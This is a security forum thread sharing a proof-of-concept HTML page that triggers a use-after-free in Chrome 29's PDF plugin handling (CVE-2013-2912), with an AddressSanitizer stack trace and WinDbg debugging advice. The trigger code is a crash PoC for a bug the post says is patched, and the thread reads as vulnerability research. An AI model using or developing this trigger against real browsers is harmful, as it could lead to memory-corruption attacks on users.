Results 1 to 5 of 5

Thread: Chrome 29.0.1547.57 NotifyInstanceWasDeleted Use After Free PoC Share/Save - My123World.Com!

  1. #1
    Garage Addict 41.w4r10r's Avatar
    Join Date
    Jul 2010
    Location
    Pune
    Posts
    338
    Blog Entries
    3

    Chrome 29.0.1547.57 NotifyInstanceWasDeleted Use After Free PoC

    Hi,

    This is PoC affecting Chrome 29.0.1547.57 , Beta, Canary which got patched in last chrome update
    reference : http://googlechromereleases.blogspot...el-update.html
    CVE-2013-2912

    Use After free vulnerability was in ppapi:roxy::PluginResource::NotifyInstanceWasDeleted and triggers with ready state event and domcontentloaded event, this issue also happens because a ready state event can be fired when loaders are canceled within domcontentloaded event.

    Code:
    <html>
    <body>
    <object id=pdf-viewer src=filenotnecessary.pdf type="application/pdf"></object>
    <script>
    		
    i = 0;
    var pdf;
    document.addEventListener('readystatechange', function() {
      
      if (i == 1)
      { 
      
    	document.body.appendChild(pdf);
      }
      else
      {
       
    	pdf = document.getElementById("pdf-viewer");
      }
      i++;
    });
    
    window.addEventListener('DOMContentLoaded', function() {
    
      pdf.reload();
    });
    </script> 
    </body>
    </html>

  2. #2
    Garage Addict 41.w4r10r's Avatar
    Join Date
    Jul 2010
    Location
    Pune
    Posts
    338
    Blog Entries
    3
    Detailed Stack Trace:

    Code:
    heap-use-after-free on address 0x61300002ddc8 at pc 0x7f763f509092 bp 0x7fff190c5360 sp 0x7fff190c5358 READ of size 8 at 0x61300002ddc8 thread T0 (chrome)
        #0 0x7f763f509091 in std::_Rb_tree<int, std::pair<int const, scoped_refptr<ppapi::proxy::PluginResourceCallbackBase> >, std::_Select1st<std::pair<int const, scoped_refptr<ppapi::proxy::PluginResourceCallbackBase> > >, std::less<int>, std::allocator<std::pair<int const, scoped_refptr<ppapi::proxy::PluginResourceCallbackBase> > > >::_M_begin() /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../../include/c++/4.6/bits/stl_tree.h:493
        #1 0x7f763f52f32e in std::_Rb_tree<int, std::pair<int const, scoped_refptr<ppapi::proxy::PluginResourceCallbackBase> >, std::_Select1st<std::pair<int const, scoped_refptr<ppapi::proxy::PluginResourceCallbackBase> > >, std::less<int>, std::allocator<std::pair<int const, scoped_refptr<ppapi::proxy::PluginResourceCallbackBase> > > >::clear() /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../../include/c++/4.6/bits/stl_tree.h:809
        #2 0x7f763d879420 in ppapi::ResourceTracker::DidDeleteInstance(int) out/Release/../../ppapi/shared_impl/resource_tracker.cc:160
        #3 0x7f763e84e9c3 in content::HostGlobals::InstanceDeleted(int) out/Release/../../content/renderer/pepper/host_globals.cc:257
        #4 0x7f763e5cc562 in ~PepperPluginInstanceImpl out/Release/../../content/renderer/pepper/pepper_plugin_instance_impl.cc:563
        #5 0x7f763e5cc17d in ~PepperPluginInstanceImpl out/Release/../../content/renderer/pepper/pepper_plugin_instance_impl.cc:524
        #6 0x7f763e8b36a7 in scoped_refptr<content::PepperPluginInstanceImpl>::operator=(content::PepperPluginInstanceImpl*) out/Release/../../base/memory/ref_counted.h:267
        #7 0x7f763e8b3887 in content::PepperWebPluginImpl::destroy() out/Release/../../content/renderer/pepper/pepper_webplugin_impl.cc:126
        #8 0x7f763fbfa03e in ~WebPluginContainerImpl out/Release/../../third_party/WebKit/Source/web/WebPluginContainerImpl.cpp:648
        #9 0x7f763fbf9edd in ~WebPluginContainerImpl out/Release/../../third_party/WebKit/Source/web/WebPluginContainerImpl.cpp:642
        #10 0x7f764236e0e3 in WTF::HashTable<WTF::RefPtr<WebCore::Widget>, WTF::KeyValuePair<WTF::RefPtr<WebCore::Widget>, WebCore::FrameView*>, WTF::KeyValuePairKeyExtractor<WTF::KeyValuePair<WTF::RefPtr<WebCore::Widget>, WebCore::FrameView*> >, WTF::PtrHash<WTF::RefPtr<WebCore::Widget> >, WTF::KeyValuePairHashTraits<WTF::HashTraits<WTF::RefPtr<WebCore::Widget> >, WTF::HashTraits<WebCore::FrameView*> >, WTF::HashTraits<WTF::RefPtr<WebCore::Widget> > >::deallocateTable(WTF::KeyValuePair<WTF::RefPtr<WebCore::Widget>, WebCore::FrameView*>*, int) out/Release/../../third_party/WebKit/Source/wtf/HashTable.h:876
        #11 0x7f7642367499 in WebCore::WidgetHierarchyUpdatesSuspensionScope::moveWidgets() out/Release/../../third_party/WebKit/Source/core/rendering/RenderWidget.cpp:69
        #12 0x7f76416b7da9 in ~WidgetHierarchyUpdatesSuspensionScope out/Release/../../third_party/WebKit/Source/core/rendering/RenderWidget.h:40
        #13 0x7f76416b2c2d in WebCore::ContainerNode::removeChild(WebCore::Node*, WebCore::ExceptionState&) out/Release/../../third_party/WebKit/Source/core/dom/ContainerNode.cpp:498
        #14 0x7f76416b14a0 in WebCore::collectChildrenAndRemoveFromOldParent(WebCore::Node*, WTF::Vector<WTF::RefPtr<WebCore::Node>, 11ul>&, WebCore::ExceptionState&) out/Release/../../third_party/WebKit/Source/core/dom/ContainerNode.cpp:70
        #15 0x7f76416b1139 in WebCore::ContainerNode::appendChild(WTF::PassRefPtr<WebCore::Node>, WebCore::ExceptionState&, WebCore::AttachBehavior) out/Release/../../third_party/WebKit/Source/core/dom/ContainerNode.cpp:609
        #16 0x7f7641798fda in WebCore::Node::appendChild(WTF::PassRefPtr<WebCore::Node>, WebCore::ExceptionState&, WebCore::AttachBehavior) out/Release/../../third_party/WebKit/Source/core/dom/Node.cpp:543
        #17 0x7f7641e419c8 in WebCore::V8Node::appendChildMethodCustom(v8::FunctionCallbackInfo<v8::Value> const&) out/Release/../../third_party/WebKit/Source/bindings/v8/custom/V8NodeCustom.cpp:120
        #18 0x7f7641d1773c in WebCore::NodeV8Internal::appendChildMethodCallbackForMainWorld(v8::FunctionCallbackInfo<v8::Value> const&) out/Release/gen/blink/bindings/V8Node.cpp:703
        #19 0x7f763ebe2b77 in v8::internal::FunctionCallbackArguments::Call(v8::Handle<v8::Value> (*)(v8::Arguments const&)) out/Release/../../v8/src/arguments.cc:103
    addr2line: '': No such file
        #20 0x7f763ec07425 in v8::internal::MaybeObject* v8::internal::HandleApiCallHelper<false>(v8::internal::(anonymous namespace)::BuiltinArguments<(v8::internal::BuiltinExtraArguments)1>, v8::internal::Isolate*) out/Release/../../v8/src/builtins.cc:1272
        #21 0x7f763ebfaf84 in v8::internal::Builtin_HandleApiCall(int, v8::internal::Object**, v8::internal::Isolate*) out/Release/../../v8/src/builtins.cc:1288
        #22 0x1a7a88f072ad in
    0x61300002ddc8 is located 72 bytes inside of 384-byte region [0x61300002dd80,0x61300002df00)
    freed by thread T0 (chrome) here:
        #0 0x7f763b0e9e95 in operator delete _asan_rtl_
        #1 0x7f763d876f9a in ppapi::Resource::NotifyInstanceWasDeleted() out/Release/../../ppapi/shared_impl/resource.cc:70
        #2 0x7f763f52e36d in ppapi::proxy::PluginResource::NotifyInstanceWasDeleted() out/Release/../../ppapi/proxy/plugin_resource.cc:62
        #3 0x7f763d879420 in ppapi::ResourceTracker::DidDeleteInstance(int) out/Release/../../ppapi/shared_impl/resource_tracker.cc:160
        #4 0x7f763e84e9c3 in content::HostGlobals::InstanceDeleted(int) out/Release/../../content/renderer/pepper/host_globals.cc:257
        #5 0x7f763e5cc562 in ~PepperPluginInstanceImpl out/Release/../../content/renderer/pepper/pepper_plugin_instance_impl.cc:563
        #6 0x7f763e5cc17d in ~PepperPluginInstanceImpl out/Release/../../content/renderer/pepper/pepper_plugin_instance_impl.cc:524
        #7 0x7f763e8b36a7 in scoped_refptr<content::PepperPluginInstanceImpl>::operator=(content::PepperPluginInstanceImpl*) out/Release/../../base/memory/ref_counted.h:267
        #8 0x7f763e8b3887 in content::PepperWebPluginImpl::destroy() out/Release/../../content/renderer/pepper/pepper_webplugin_impl.cc:126
        #9 0x7f763fbfa03e in ~WebPluginContainerImpl out/Release/../../third_party/WebKit/Source/web/WebPluginContainerImpl.cpp:648
        #10 0x7f763fbf9edd in ~WebPluginContainerImpl out/Release/../../third_party/WebKit/Source/web/WebPluginContainerImpl.cpp:642
        #11 0x7f764236e0e3 in WTF::HashTable<WTF::RefPtr<WebCore::Widget>, WTF::KeyValuePair<WTF::RefPtr<WebCore::Widget>, WebCore::FrameView*>, WTF::KeyValuePairKeyExtractor<WTF::KeyValuePair<WTF::RefPtr<WebCore::Widget>, WebCore::FrameView*> >, WTF::PtrHash<WTF::RefPtr<WebCore::Widget> >, WTF::KeyValuePairHashTraits<WTF::HashTraits<WTF::RefPtr<WebCore::Widget> >, WTF::HashTraits<WebCore::FrameView*> >, WTF::HashTraits<WTF::RefPtr<WebCore::Widget> > >::deallocateTable(WTF::KeyValuePair<WTF::RefPtr<WebCore::Widget>, WebCore::FrameView*>*, int) out/Release/../../third_party/WebKit/Source/wtf/HashTable.h:876
        #12 0x7f7642367499 in WebCore::WidgetHierarchyUpdatesSuspensionScope::moveWidgets() out/Release/../../third_party/WebKit/Source/core/rendering/RenderWidget.cpp:69
        #13 0x7f76416b7da9 in ~WidgetHierarchyUpdatesSuspensionScope out/Release/../../third_party/WebKit/Source/core/rendering/RenderWidget.h:40
        #14 0x7f76416b2c2d in WebCore::ContainerNode::removeChild(WebCore::Node*, WebCore::ExceptionState&) out/Release/../../third_party/WebKit/Source/core/dom/ContainerNode.cpp:498
        #15 0x7f76416b14a0 in WebCore::collectChildrenAndRemoveFromOldParent(WebCore::Node*, WTF::Vector<WTF::RefPtr<WebCore::Node>, 11ul>&, WebCore::ExceptionState&) out/Release/../../third_party/WebKit/Source/core/dom/ContainerNode.cpp:70
        #16 0x7f76416b1139 in WebCore::ContainerNode::appendChild(WTF::PassRefPtr<WebCore::Node>, WebCore::ExceptionState&, WebCore::AttachBehavior) out/Release/../../third_party/WebKit/Source/core/dom/ContainerNode.cpp:609
        #17 0x7f7641798fda in WebCore::Node::appendChild(WTF::PassRefPtr<WebCore::Node>, WebCore::ExceptionState&, WebCore::AttachBehavior) out/Release/../../third_party/WebKit/Source/core/dom/Node.cpp:543
        #18 0x7f7641e419c8 in WebCore::V8Node::appendChildMethodCustom(v8::FunctionCallbackInfo<v8::Value> const&) out/Release/../../third_party/WebKit/Source/bindings/v8/custom/V8NodeCustom.cpp:120
        #19 0x7f7641d1773c in WebCore::NodeV8Internal::appendChildMethodCallbackForMainWorld(v8::FunctionCallbackInfo<v8::Value> const&) out/Release/gen/blink/bindings/V8Node.cpp:703
        #20 0x7f763ebe2b77 in v8::internal::FunctionCallbackArguments::Call(v8::Handle<v8::Value> (*)(v8::Arguments const&)) out/Release/../../v8/src/arguments.cc:103
        #21 0x7f763ec07425 in v8::internal::MaybeObject* v8::internal::HandleApiCallHelper<false>(v8::internal::(anonymous namespace)::BuiltinArguments<(v8::internal::BuiltinExtraArguments)1>, v8::internal::Isolate*) out/Release/../../v8/src/builtins.cc:1272
        #22 0x7f763ebfaf84 in v8::internal::Builtin_HandleApiCall(int, v8::internal::Object**, v8::internal::Isolate*) out/Release/../../v8/src/builtins.cc:1288
        #23 0x1a7a88f072ad in
        #24 0x1a7a88f63a2e in
        #25 0x1a7a88f108b3 in
        #26 0x1a7a88f2acfd in
        #27 0x1a7a88f17e16 in
        #28 0x7f763ec77dd2 in v8::internal::Invoke(bool, v8::internal::Handle<v8::internal::JSFunction>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*, bool*) out/Release/../../v8/src/execution.cc:119
        #29 0x7f763ebb9e78 in v8::Function::Call(v8::Handle<v8::Object>, int, v8::Handle<v8::Value>*) out/Release/../../v8/src/api.cc:4387
    previously allocated by thread T0 (chrome) here:
    Keep hunting for bugs

  3. #3

    Red face how you can debug chrome ?

    hi~
    i want to reappear this bug,can you tell me which debugger you use? and how to attach chrome?
    i try to attach it use ollydbg or windbg but it not work
    thanks

  4. #4
    Garage Addict 41.w4r10r's Avatar
    Join Date
    Jul 2010
    Location
    Pune
    Posts
    338
    Blog Entries
    3
    i am using windbg for analyzing crashes.. for chrome or any other sandbox process debugging you need to tick check box when you are executing program under windbg.

    eg: Start windbg -> press ctrl+e -> select program you want to debug (c:\program files\google\chrome\application\chrome.exe) -> Click on "debug child process also"(bottom of box) -> click open

    above process will start chrome under windbg now load you poc into chrome and you can see crash under debugger now you start analyzing it

  5. #5

    Red face a more problem

    Happy Christmas!
    thanks for you reply~but i have another question
    i use xp sp3+chrome+windbg and i get the crash at:chrome_1c30000!RelaunchChromeBrowserWithNewComm andLineIfNeeded++0x94e13e:
    035395c9 807f1500 cmp byte ptr [edi+15h],0 ds:0023:fa60061b=??
    i want to know how you identify the thread who has the flaw?
    please give me some advise

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •